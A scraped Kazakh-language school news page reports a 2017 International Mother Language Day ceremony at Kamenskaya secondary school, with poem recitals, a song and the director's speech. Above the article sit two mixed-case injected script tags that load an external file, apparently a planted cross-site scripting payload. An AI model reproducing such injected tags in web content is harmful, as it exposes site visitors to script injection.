<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

22.02.2017

21 ақпан – Халықаралық ана тілі күні!

 

2017 жылдың 21 ақпан күні Каменская орта мектебінде салтанатты жиында Халықаралық ана тілі күнінің ашылуы өтті.  Каменская орта мектебінің 9 сынып  оқушылары қазақ, орыс, ағылшын тілдерінде ақын – жазушыларымыздың ана тілі туралы өлеңдерін жатқа оқыды. 5 сынып оқушылары «Әрқашан күн сөнбесін!» атты әнді қазақ және орыс тілінде шырқады. Мектеп директоры В.Н.Хлыстова құттықтау сөз сөйлеп, өз сөзінде ана тілі – бұл халықтың рухани мұрасы,  қоршаған ортаны танып, сөйлеп үйренетін балалық шақтың тілі. Ана тілді бағалап, құрметтеп, сақтау, барлық салаларда және бағыттарда дамыту өте маңызды. Кез келген ұлттың рухани байлығы – оның ана тілі екенін атап өтті.

Просмотров: 1517


Пікір қосу



Деректерді қолтаңбаға қосу